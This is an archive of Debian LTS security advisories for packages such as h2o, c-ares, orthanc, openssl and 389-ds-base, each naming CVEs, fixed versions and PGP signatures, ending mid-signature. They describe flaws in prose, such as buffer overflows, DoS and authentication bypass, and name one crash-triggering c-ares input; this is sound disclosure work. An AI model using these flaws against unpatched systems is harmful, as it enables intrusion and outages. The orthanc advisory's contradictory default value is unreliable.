[SECURITY] [DLA 3638-1] h2o security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3638-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky October 29, 2023 https://wiki.debian.org/LTS - - Package: h2o Version: 2.2.5+dfsg2-2+deb10u2 CVE ID : CVE-2023-44487 Debian Bug : 1054232 A vulnerability has been identified in h2o, a high-performance web server with support for HTTP/2. A security vulnerability CVE-2023-44487 was discovered that could potentially be exploited to disrupt server operation. The vulnerability in the h2o HTTP/2 server was related to the handling of certain types of HTTP/2 requests. In certain scenarios, an attacker could send a series of malicious requests, causing the server to process them rapidly and exhaust system resources. The applied upstream patch changes the ABI. Therefore, if your application is built against any shared libraries of h2o, you need to rebuild it. No Debian package is affected. For Debian 10 buster, this problem has been fixed in version 2.2.5+dfsg2-2+deb10u2. We recommend that you upgrade your h2o packages. For the detailed security status of h2o please refer to its security tracker page at: https://security-tracker.debian.org/tracker/h2o Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmVBCo8ACgkQ0+Fzg8+n /wbanQ//Yo0J2I6ph/5a2hZfQ+kgbsMBXCy7hZh6CenGPgHTjCWPp48ss7Pje0ZB j6w6EdMMpqgGHkS3ODMoavcK1Kvh+9ARtpS8yHvLuQo60IF8juaeJXQvSYZm9Lvk 4E7EiMOZ3MU+zPht9DgDi6CdeT9TS0aMRqWT89ClRJ63PUFJvIojby6wSKZ5jXg5 REoD1tAwNw+TMpQuH5NFCkn/SwhzPxwV/gzLSgwqynkXOBoVk1oLQ0e0utyla3tg RUl1x3b6LGm3mzpsufCSJ6e4nLoj7VWz0w1/U+RPYB+Sp4ORailC1LwF9GwjEuhq o+CETCwUsO4WtyR5QtSFTWYDBF65j9X+OfOSsuC5POykBM/KmXyRsZHzeETp30/c vbciK9xFP5b5iNk1aEfLxL2QJVcENFAfBzfIizggKWSFVVoJiSDQVbN3dY4QoQ8P yXX2CFgQmmv0TtSp7j7Lq1/oAxIiIp4RQWjqA18T3w1muuQ20fNJnEgNAs0Lh69v eiM6qbP5w9WMC0BUjPSqmg693A+SPk5nxcq1BX1uvQmF1UGlKCGX8E7iX8YAthjg KfWHS9KEUuW4AyoHCnJFtRqSEumScOaPfzNcfYMn/aCPCZ/TL/Qa1Mft26hpBn66 j7C637FYQ4gLCQMRykeHo45ES4jaZZO6XuotgUgDybgdzsv0vjc= =0auQ -END PGP SIGNATURE-
[SECURITY] [DLA 3567-1] c-ares security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3567-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky September 15, 2023https://wiki.debian.org/LTS - - Package: c-ares Version: 1.14.0-1+deb10u4 CVE ID : CVE-2020-22217 A vulnerability has been identified in c-ares, an asynchronous name resolver library: CVE-2020-22217: A buffer overflow vulnerability has been found in c-ares before via the function ares_parse_soa_reply in ares_parse_soa_reply.c. This vulnerability was discovered through fuzzing. Exploitation of this vulnerability may allow an attacker to execute arbitrary code or cause a denial of service condition. For Debian 10 buster, this problem has been fixed in version 1.14.0-1+deb10u4. We recommend that you upgrade your c-ares packages. For the detailed security status of c-ares please refer to its security tracker page at: https://security-tracker.debian.org/tracker/c-ares Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmUD/DoACgkQ0+Fzg8+n /wZ4lw/9FgVXE7CvEKIGfSFXX4D/ayOVUUJ21pha8cI78qWvO2Lfxhc1MBN94eMX RLrt6KcLFfLkxSBq6KhHSOZ1ZuKZ56wN4OzsuvzClquTL1BZ63TfnDPCs1StkuTs PCNvmDdObRMXAEOjzYBwC61Zr89kYnijubupdVeCIG7L2+lfbjlWcxeGEu05C/9i HSD4WBo+RCtWhZd3LtDoHWn1kS6DhX+fHTrO22jE/+rL8i6Tc2foTcDzcAInLGG1 J5DqXfzLSQLk6pjH1eDGrrNN2ANL7HIY8UexUBKKJTAdSgcZ5qXLwhB1ymZRvw8R tvbuk0g8B7lNCoSDIU4HSUiZBfm4Pi8i1GFMZSqPG8cqWqpSbPYO6ZfAVM8PWt1i Xxf2tpiE8LmNf0KyI5epXSFugIeFtAkpQBiBc9OGRTH6CybUfpGf8e4rvdZzGPFR yS9be+d5/SlG++Jq3JT/Iw56kSAicHJenZtlIND0LWJ9TBxhRD80fQ6JtwEn0C++ Ko848oTzGya61kKajAFqv4wUXu9pheO1ZWDUgmPTqniHHKo9EeK7rn2SYqRmZVEH wbckwLC924JItis9YLuuNc+jE4VO1oDWbwMBGb2iChx4476YwQHkzYFvQdwCzmv3 JUR0zZSzh9/pqH92BttZx/+uWVMBc+ZIbvOKgTEPXxjaAx7ZuPo= =V+cN -END PGP SIGNATURE-
[SECURITY] [DLA 3562-1] orthanc security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3562-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky September 12, 2023https://wiki.debian.org/LTS - - Package: orthanc Version: 1.5.6+dfsg-1+deb10u1 CVE ID : CVE-2023-33466 Debian Bug : 1040597 A security vulnerability was identified in Orthanc, a DICOM server used for medical imaging, whereby authenticated API users had the capability to overwrite arbitrary files and, in certain configurations, execute unauthorized code. This update addresses the issue by backporting a safeguard mechanism: the RestApiWriteToFileSystemEnabled option is now included, and it is set to "true" by default in the /etc/orthanc/orthanc.json configuration file. Should users wish to revert to the previous behavior, they can manually set this option to "true" themselves. For Debian 10 buster, this problem has been fixed in version 1.5.6+dfsg-1+deb10u1. We recommend that you upgrade your orthanc packages. For the detailed security status of orthanc please refer to its security tracker page at: https://security-tracker.debian.org/tracker/orthanc Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmUAHycACgkQ0+Fzg8+n /wbzLw/+OwxSnkOEATh2LGqRA4RwOFzCdCZxQvjRL+gzb6dvM2eG9P0aSs5/Ek2e kd9uSTRUvgkBoH00ku5QXVytXfiSbzEKZFqowRgCOaCTPfEHJDY6xxzXd8uPdfRY ZmaRUuwJDi4Wu0k8HBBZ+47vv8jXCXKLb2Z16aAjKaegCfMINujgMH5N/Ld6RlfX i4Gr+f1YTfwIHssEKj7IWGYd5+uoY/RoRbgWcIRWDjWUQ3a+/evTx8k6OV3E978G x9PC6loQGDZZLCypdhB6paIyKVpwD66h2AnIG5xAK+awv2SW0lb+SywcnJAqyaHa Hu3UvRI3YCSOMVkkuOyQ/GN3PhUOJ0+hhFGsaM9UFWWlZheARpqLSNYHdRRTw5rf XNPDiKkieUL4HC0bQQxuSGf3h71OpHIavfPX7OeysgKz3NfjYBl0l4RbmwQi1kNs 6zfOSPx+5hJbPGoQssMn1j7TWnWnZTOPPrgWVy/PX1JF6y47465gJeoxIQ8tFqbs 8Mx+LeH0HyjteYtVCCMPg1OPATTMSDBzfiY0JUKcowoOanLvL/+0MRH1A2iBcSAw HW3xRLA/6AB14iJGDwN7DyFXIkkNk/pLMM/siSMiBDP2NU68+ortlN6Lec+n7QFF YJAFJqeaLqTLf2fnJ9oUs9fyD3uBioec3uCqcm3rjTt7rsabpT4= =uDem -END PGP SIGNATURE-
[SECURITY] [DLA 3530-1] openssl security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3530-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky August 15, 2023 https://wiki.debian.org/LTS - - Package: openssl Version: 1.1.1n-0+deb10u6 CVE ID : CVE-2023-3446 CVE-2023-3817 Two vunerabilities were discovered in openssl, a Secure Sockets Layer toolkit: CVE-2023-3446, CVE-2023-3817 Excessively long DH key or parameter checks can cause significant delays in applications using DH_check(), DH_check_ex(), or EVP_PKEY_param_check() functions, potentially leading to Denial of Service attacks when keys or parameters are obtained from untrusted sources. For Debian 10 buster, these problems have been fixed in version 1.1.1n-0+deb10u6. We recommend that you upgrade your openssl packages. For the detailed security status of openssl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openssl Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmTcZQoACgkQ0+Fzg8+n /wYumRAAj29oKHHqdz8gZgy+wZKZ86QUDtPGDLeGcgN0A1aLowvxtpfzXyR/p246 cn6tn2DiDo9wPvCq/7zMcbgv3i9a/vjS19769t0CtjyMSzp4F/B4R7e+wW69rXh2 42eNoRmvJtFtN0uyWARjOA3x3TKAL5oWcu/Tm7Ej5Ie9BKffCt4yAFn3dFbkYCF7 pYOQEsaBEBKclnX9diXvDCjxvh+8hHxCXTyIBtbVXRJwMzcOB0AoL18eGbbNE/i/ fobKMnlp4Iyn5OXokNFyxyzIEbc4281bndy/LbrVv+Rb3J8lejZRU/iAnSN0UPEV 1E/OpDJo49s6c3hzkTTG2by+TwoF3ZhPfltrL9ORtaCz8vGkLdx1LNE/EjS3fj8n 4w+MC89yBJt+Ira0/TOIgdZ7AFkoF+O1lhyC72uS0V5D0CQvqZnQ0msDUZj1xrfU /xVkhznjeHhJHF/3Te3SEmLLC0P8E630yn3Xq+5lkxr3u7ewvXtMbhVRezLZ6q3y i7uYDorZ6neToPVhhqmENqfn3QKHmOpi9Y6znY3IAWAuJkAsFUGaNmoHIfmftL0j YvyNEg7JjVcvAjKt0T2K6J30YPl+WXcwNE4DEAD3GG2yKMcYHTQrUs9qN6txienk mKA46MbjyqxLE5BB0MhFzrhCt6adr3ruWvOVK2naeSce0mgwHrw= =Kzxb -END PGP SIGNATURE-
[SECURITY] [DLA 3471-1] c-ares security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3471-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky June 26, 2023 https://wiki.debian.org/LTS - - Package: c-ares Version: 1.14.0-1+deb10u3 CVE ID : CVE-2023-31130 CVE-2023-32067 Two vunerabilities were discovered in c-ares, an asynchronous name resolver library: CVE-2023-31130 ares_inet_net_pton() is found to be vulnerable to a buffer underflow for certain ipv6 addresses, in particular "0::00:00:00/2" was found to cause an issue. c-ares only uses this function internally for configuration purposes, however external usage for other purposes may cause more severe issues. CVE-2023-32067 Target resolver may erroneously interprets a malformed UDP packet with a length of 0 as a graceful shutdown of the connection, which could cause a denial of service. For Debian 10 buster, these problems have been fixed in version 1.14.0-1+deb10u3. We recommend that you upgrade your c-ares packages. For the detailed security status of c-ares please refer to its security tracker page at: https://security-tracker.debian.org/tracker/c-ares Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmSZ61QACgkQ0+Fzg8+n /wb82hAAmK/VnXYGgePdz6nDLPP+Zz/+VfykeDdOt6Ru2KL0fkuGWTtxDwRJ6R/O yopEG3Ws68vapseQd8aQdwkDbmhEOmxcEqfvbVj0DTx5uu70Dg/jxEACDcnFwN2V wUPt2PoJj5Qy20gF1G4kEFzKg8u6W0m+fCXf9mWAyF0+0cir9aXobCS7AbDmiweO 9QEAY5ybJdytKiFA7fYNm63j8LCTgny5emDmXeEyFUd8500poel9UbMVmglUSton Qdl2EbnvHx1BZ9WK++4KKQZbn5at/N+2ldl8oefDOnHuyIc3QZh1KXjahkrU6q9X LKTJTN3PiQj1NXOt5NHkjfeefk5Ofe/1mLlbaZ7QAYKAyOn8NQMpMEY+oIb9T2UO yKkUt958KvAmPZzwLFfDFzU04VgX1xygiLhpQvYJoPNCgqrBlqsaff35EbAdEzJb W46qGmpIn2Uy9qbEWGgyWBg6moYEA0LF8CK4JMEPA6Cyh4Ka7nfGpfqCGkN5C8Xb IgyiQf9+oCh+IK9p3YLv+4lIt5Y84LYxYooqdPJPceJxlbEgYNIxQpydqtNAnWie o/LIyDLSI0hhDs9N9D0vmeyETl+vUOmKUjUmnp3R3G844svK18MahXbudMxFk44f EyMTVFRz4WexiyHa32MuApIBUHAdSu70vTvLIivinIgIrMyoMCo= =LIQi -END PGP SIGNATURE-
[SECURITY] [DLA 3399-1] 389-ds-base security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3399-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky April 24, 2023https://wiki.debian.org/LTS - - Package: 389-ds-base Version: 1.4.0.21-1+deb10u1 CVE ID : CVE-2019-3883 CVE-2019-10224 CVE-2019-14824 CVE-2021-3514 CVE-2021-3652 CVE-2021-4091 CVE-2022-0918 CVE-2022-0996 CVE-2022-2850 Multiple security issues were discovered in 389-ds-base: an open source LDAP server for Linux. CVE-2019-3883 SSL/TLS requests do not enforce ioblocktimeout limit, leading to DoS vulnerability by hanging all workers with hanging LDAP requests. CVE-2019-10224 The vulnerability may disclose sensitive information, such as the Directory Manager password, when the dscreate and dsconf commands are executed in verbose mode. An attacker who can view the screen or capture the terminal standard error output can exploit thisvulnerability to obtain confidential information. CVE-2019-14824 The 'deref' plugin of 389-ds-base has a vulnerability that enables it to disclose attribute values using the 'search' permission. In certain setups, an authenticated attacker can exploit this flaw to access confidential attributes, including password hashes. CVE-2021-3514 If a sync_repl client is used, an authenticated attacker can trigger a crash by exploiting a specially crafted query that leads to a NULL pointer dereference. CVE-2021-3652 Importing an asterisk as password hashes enables successful authentication with any password, allowing attackers to access accounts with disabled passwords. CVE-2021-4091 A double free was found in the way 389-ds-base handles virtual attributes context in persistent searches. An attacker could send a series of search requests, forcing the server to behave unexpectedly, and crash. CVE-2022-0918 An unauthenticated attacker with network access to the LDAP port can cause a denial of service. The denial of service is triggered by a single message sent over a TCP connection, no bind or other authentication is required. The message triggers a segmentation fault that results in slapd crashing. CVE-2022-0996 Expired password was still allowed to access the database. A user whose password was expired was still allowed to access the database as if the password was not expired. Once a password is expired, and "grace logins" have been used up, the account is basically supposed to be locked out and should not be allowed to perform any privileged action. CVE-2022-2850 The vulnerability in content synchronization plugin enables an authenticated attacker to trigger a denial of service via a crafted query through a NULL pointer dereference. For Debian 10 buster, these problems have been fixed in version 1.4.0.21-1+deb10u1. We recommend that you upgrade your 389-ds-base packages. For the detailed security status of 389-ds-base please refer to its security tracker page at: https://security-tracker.debian.org/tracker/389-ds-base Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmRGErYACgkQ0+Fzg8+n /wZqwhAAhec1oVkYCADWDJgb8CKmFwqtqwffRJPOdDZ/V6PEdxp4RmC7+YuVCgD7 aBGv+p0uTxqGfW69wlOKExHfakyR/GDAS695agPOrVoOv/+0S3l5rRz/qAT5YaNX YSYYeKuFBaG6S8KmW3ur834eXcLylyFuwZND6waez72FWECM5wi9lmB1/5D1Zjn1 14CegrFXYzAIPiXLnTK6pX2a0GUbLZCGH6fNIAY+ensAZMLyiVrU0tJ89OV04hvw E3XmQH3VB17KuThYPUp5X7Ricl+i6AhoA7Dx1owIzLqWNtTTzdWEhMPhE4iGG9Q2 GidwMWBbmooilT6lvU581aeLtfzTUhWOd7Ty5+nJiNIDFY5EDcMbNIioK5zwGqW0 YR1kwPD2am44/ZqrOlqkaUUJ1dzXJ/IHed/ybW4ozsjHTQ25cLYftC91DCaMSn6r /vaYDDcnSFGbz/C3av5QAf/PbkrYq3wf815X52KM3Vzqd+b/9dhlwuzO60Ky8geb uDnJJeK0E2iqdfLHhEtWidGagYTkFV0FWdepU/7RWQVmLaIgdHBKX6eyEEIfEDK/ 936j8iclt79YOhdcH/xk6dKoGwd4AL4x2OYwzeGll8kCEh6YNlyzlwrpFHH/y1Cy XV3ZrGUdyR6QYaFRjaivrXymOQdFwHkGP2xhEZzdocEQTYzWEh8= =/mMk -END PGP SIGNATURE-
[SECURITY] [DLA 3376-1] svgpp security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3376-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky March 31, 2023https://wiki.debian.org/LTS - - Package: svgpp Version: 1.2.3+dfsg1-6+deb10u1 CVE ID : CVE-2019-6245 CVE-2019-6247 CVE-2021-44960 Multiple security issues were discovered in svgpp: a C++ library for parsing and rendering Scalable Vector Graphics (SVG) files. CVE-2021-44960 The XMLDocument::getRoot function in the renderDocument function handled the XMLDocument object improperly. Specifically, it returned a null pointer prematurely at the second if statement, resulting in a null pointer reference behind the renderDocument function. CVE-2019-6245 and CVE-2019-6247: issues were discovered in Anti-Grain Geometry (AGG) within the function agg::cell_aa::not_equal. Since svgpp is a header-only library, the issue is only transitive in theory. As a result, only a dependency version hardening has been added to the control file. For Debian 10 buster, these problems have been fixed in version 1.2.3+dfsg1-6+deb10u1. We recommend that you upgrade your svgpp packages. For the detailed security status of svgpp please refer to its security tracker page at: https://security-tracker.debian.org/tracker/svgpp Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmQoWJMACgkQ0+Fzg8+n /wb9exAAl1LsKmtRibU1i6ffoQQkdzYr++yGd/4HP6IgU6DGn7/1mWMZOI5sRqVr Xf7/aIO/E90LhflKQlLD9U/CIVRv1I8IoOnx+FzgO04sbAhgStE95BK8G2ecWQFj f2oSFEnLcpS3V1Axad5WQGTfzphKCUMbN9o3McFvirhYQIPyKTGQrf0OopYK/bYA SHNLuIP4MpasTcdjCpEXWCO6HqM7hhRYxxKf5oWhJtCuP3WfIL2P5sdrYr4ZevSj 8snonvzqK4DCLIDy/N0XIwDuKfotFl9h42fmqJbHKNdBu1jaLYL8xqkgu6/NyvTf MiqJRA/JS3AG1yYv58R0/tOmJcIigCbSFE3TPvHSLmVeIAMQdfdVaS1Nq/NO5405 /ouj4lQhFSklh5WkhnJQp9F9tA/dICTMGcoY8OZUhY07Jp3OPHqOCIXC1+q2gwd2 baBTiUNE0rVs726mLZoghKnGNugsWSCOjLJWDq5zAXlWo6XCzEwkwEZR5Ge8wATd i69ZORt5O5DsPmfFSGpKyplr/VAmgHrUzUxusiNcpBTVJ6Ips4jGRZ8u6VRh6+dE 5Lsqg3CZo9YGnnH/kmOLni7iBb4pbml97MmjG90QH8q2QaAgQ/32S5v756dBSWdc uXX2Yh29CxXOnhdEsgzcnkIrbNfzXgjBKX1X4ucFA9UlZyxZAxI= =Ogx9 -END PGP SIGNATURE-
[SECURITY] [DLA 3353-1] xfig security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3353-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky March 05, 2023https://wiki.debian.org/LTS - - Package: xfig Version: 1:3.2.7a-3+deb10u1 CVE ID : CVE-2021-40241 Debian Bug : 992395 A security issue has been discovered in xfig, a diagramming tool for the interactive generation of figures under X11. CVE-2021-40241: A potential buffer overflow exists in the file src/w_help.c at line 55. Specifically, the length of the string returned by getenv("LANG") may become very long and cause a buffer overflow while executing the sprintf() function. This vulnerability could potentially allow an attacker to execute arbitrary code or cause a denial-of-service condition. For Debian 10 buster, this problem has been fixed in version 1:3.2.7a-3+deb10u1. We recommend that you upgrade your xfig packages. For the detailed security status of xfig please refer to its security tracker page at: https://security-tracker.debian.org/tracker/xfig Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmQEvKEACgkQ0+Fzg8+n /waH1g/+IW/TB5mq/oTzEmohkmCwfz/j6WiRQr90yWo3TU/o2HkO7owpbqJuMNvi gLADPK4qd1sL52oAZ9hThjnxaDtnqGRxkuRVxu0IVIMeH/wlXzj2+r58k+iBOhzY oE07ccCa436IhS72djbBRNvEDBZv72NQicU3fXQXPJcizyOvITw/x+ykc9gBHICO UnDj9HE9x5QTDH+BgTVZg/43jAzC2SF2Ydq/Z7yrKI1MFvZgZFXNrYc+BtBHlQWU Z1ZSb+WxltKDb8tb9buPZzdhZmfPnz/6y0fDylEfSislTVjbK0CbgL0AxCNTqniD JX7/KWCrVvg7goTk9br3DMlqvX1EMRe+cEY8VZealIFwQ8GTyBMhx1Kq8iCwrH/v 8oSoIGNw1y48ijvvwl5r73Twxb7PJoB8NWidt99gnwMlH6jf40CB7m/K2pxoft+p so5yGBIMIYxty5A+82NK9wesS4ckYJy9aMsYpge4tzkL98T1zYfraHVUZeEVc01I e4rsDlrO73MRyjgPkLUU+EoFjv+Z23BypjRpCiE2NUGk964pa2vThANWkOsTC1qj 7GPq7Sa664bPojjaPdD4BWHn062ibVoeAd88IHyJxwzijM3vLtjrJoma7hmcYYpV 0Km5ITJ0+nZ2wxgRcD+P4S4OGZvVRNJdkDcoWfddi2SJyXM4OeE= =rD2W -END PGP SIGNATURE-
[SECURITY] [DLA 3122-1] dovecot security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3122-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky September 27, 2022https://wiki.debian.org/LTS - - Package: dovecot Version: 1:2.3.4.1-5+deb10u7 CVE ID : CVE-2021-33515 CVE-2022-30550 Two security issues were discovered in dovecot: IMAP and POP3 email server. CVE-2021-33515 The submission service in Dovecot before 2.3.15 allows STARTTLS command injection in lib-smtp. Sensitive information can be redirected to an attacker-controlled address. CVE-2022-30550 When two passdb configuration entries exist with the same driver and args settings, incorrectly applied settings can lead to an unintended security configuration and can permit privilege escalation in certain configurations. For Debian 10 buster, these problems have been fixed in version 1:2.3.4.1-5+deb10u7. We recommend that you upgrade your dovecot packages. For the detailed security status of dovecot please refer to its security tracker page at: https://security-tracker.debian.org/tracker/dovecot Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmMyeTgACgkQ0+Fzg8+n /wbdKw//YewFBHxoPkh17+pDNUNrfK3tI95dFaqRN7vsuJXniE/hJgMSdXGtOWEM /RsnJzTK5Ku7EASEf072NM00KMjwtkmxYVKpNN1SKoseg8PfBgWqaicDiEYJqMw2 CFpk20rf0Fr2yuuRMYWJpYXMPKpPLXSVy7IOqrU7RTvTiEK3eyqZ/O/QMwxFKCZj X7z/nkBQtPqW+2eI1A3ezNrhBSbs5XolEM1v31MxusiDFwYnbG+7jqpA4BPbwPwQ hhJurzzqnL0Z1glNZRavUrNrcEV/qp7x+LRmzYy9aCbjj4VuonpXKMIUD73exT9P bio2WzSEAJNdNG3jZE9vA6Nyp93Zp5VimYhK1VbBJEhpWr0zFroDYk81ihjdcEPC qpNaBJlHpOApCaWibC8azs8SPmxi9NDch1ejrH0lmCfu+dQAdR+4uKttZIdXqmF4 WYLXLECb4wACjyJ1yKCuulOqjlGrCdzk4rasz+aiGYs4DVYWgMrRgwgxG47+ALYd /JIsY8/xw8zI1kv+AiVrS1q5qMIxr9CtXFQYV7J2UC/TjUPsh5Chi2Bop3Q42HM4 3lYp3t2R1C+c91q+af0tjoKKhP3XZot+JmaEMyZ6rpD0t+vMYlwb79dq9M6jW5pw +2xZQWJ/xyaYQ5IzBkjTw2RzCHkl1nCbKeDGtPbFk2LxU2A8Z3Q= =lZEB -END PGP SIGNATURE-
[SECURITY] [DLA 3097-1] thunderbird security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3097-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky September 04, 2022https://wiki.debian.org/LTS - - Package: thunderbird Version: 1:91.13.0-1~deb10u1 CVE ID : CVE-2022-38472 CVE-2022-38473 CVE-2022-38478 Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code. For Debian 10 buster, these problems have been fixed in version 1:91.13.0-1~deb10u1. We recommend that you upgrade your thunderbird packages. For the detailed security status of thunderbird please refer to its security tracker page at: https://security-tracker.debian.org/tracker/thunderbird Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmMVECoACgkQ0+Fzg8+n /wYt8xAAmengfdphLdwH4GZY2Jm0TT8TzmgI9MOa7de3hEnOLtBKX9qE7ne2TD4u pvHIPklor83XBgPBKwyUfYTbiYtTwRz8HdmORG8zUdi2+7NPBq/7T6DMcdbLuYlD VqYZGKB8DkJL5SI9ISJ8mp52CJ8epnnGoy7/Fps9jEd6QGGs/hrv6BWzeOTNhot/ vkFCqWe+0oNoOIaG0MHiiLNhaBZzJrH3CKlV2ezVmXaG6izJTq36wEiOKCuNRPUj zcWCdaWqi38MuXTWwIynM6tEh4b5R3PayTnti1c1UQl9Fs+T+4V5l6QQqcPzF95B gk4nmQRZYeXCb/OI4oIwxDcHC1b+aLuHMXeS6KZn4KJHLQN/B4THIoTUNECjOd6P GPd02zr9LuhnLjpIptxuGgQvTAdxXWqivkqH9cZEeQ3qI9DeLAyCYuUhEfP9vgGG nIjVIDNXGs4ZsErd5ck7JMiATUmAIC6iuhC0GRnYTzKiwrFUwppz9AobdeSag8wm fuIf0oX4pevBwmq3+6VhxSn6ykxIJy5AGVYXlOIcwIzUEph0Vamt1pDEfozPDsjr qYDXcrfoVlilayHTu/CFq2/po1XSIyt9LdWTdFPLVPWKcAHCSXtNP15R//7RoFdM OFLHrUv0irf6pqV2xU5lXYw58nYce5tTZETKcXO5sjINclI2gu0= =QV36 -END PGP SIGNATURE-
[SECURITY] [DLA 3087-1] webkit2gtk security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3087-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky August 30, 2022 https://wiki.debian.org/LTS - - Package: webkit2gtk Version: 2.36.7-1~deb10u1 CVE ID : CVE-2022-32893 The following vulnerabilities have been discovered in the WebKitGTK web engine: CVE-2022-32893 An anonymous researcher discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. For Debian 10 buster, this problem has been fixed in version 2.36.7-1~deb10u1. We recommend that you upgrade your webkit2gtk packages. For the detailed security status of webkit2gtk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/webkit2gtk Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmMOOScACgkQ0+Fzg8+n /wYLWA/5AfkmYxgRJrmY1YIaknbP9BWsNn8/nxIwaVgN8jZlA0GkzhB0+J5GAPBx 5/fblyoWXWRdEsBekqlTTqOQsr5SdPWstbVSrb2eLkj6F/Yp6DhDRMWbOGU/gc5P CBUdYOZ4/tB4XXeTrxDb//Q4Al7t2iRgADold1zlXw/TCEJAOa6qO6kZgZjf1xMq YZmfU/h2FOCjDn9QccUM/tjoa+ePFzkz8P/3uQupP297c0G3wlWaCtkmca8h0UgD LNjA+x3erQHYU354GSS1WCjbZChKdncEveWMMbV88YK8JLXbq3sD+Ztiqz3waDh+ I5h/Yh3ntSPnpp69ozHN/XbfUUJ3oTj4jP4VGWAuKhagKFg6dfIauilSkZ/FMCP9 bJxJWPOnyddiPKRHKA8gnmza5ponP2iwghAHsmORFntvDVp8R7N6xLWFE6cryoem B/BVIF5xEsnZlD0MboGN/ZAcaXyeIqF2I6MxLLSaBTgnOShE1Ku26j8QOvqaL/er p5inaZTu4WP1y0YqFgD6rvWjVGy5ZsCUbBhGDjJhK0FYTqWdOIu/QSomxfd0yxfC 2+fy13MYetPQXvMWYfDDGixxBK0lLJ0ArroGvad0WnB+uyEwX29jiq0rG+tyM9I3 hV8lWFGg4dIWRfln8oWmIiNcj7jANBa5B/Hdc3jlRwc4FY3Sv8I= =tjtU -END PGP SIGNATURE-
[SECURITY] [DLA 3084-1] ndpi security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3084-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky August 27, 2022 https://wiki.debian.org/LTS - - Package: ndpi Version: 2.6-3+deb10u1 CVE ID : CVE-2020-15472 CVE-2020-15476 Two security issues have been discovered in ndpi: deep packet inspection library. CVE-2020-15472 H.323 dissector is vulnerable to a heap-based buffer over-read in ndpi_search_h323 in lib/protocols/h323.c. CVE-2020-15476 Oracle protocol dissector has a heap-based buffer over-read in ndpi_search_oracle. For Debian 10 buster, these problems have been fixed in version 2.6-3+deb10u1. We recommend that you upgrade your ndpi packages. For the detailed security status of ndpi please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ndpi Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- 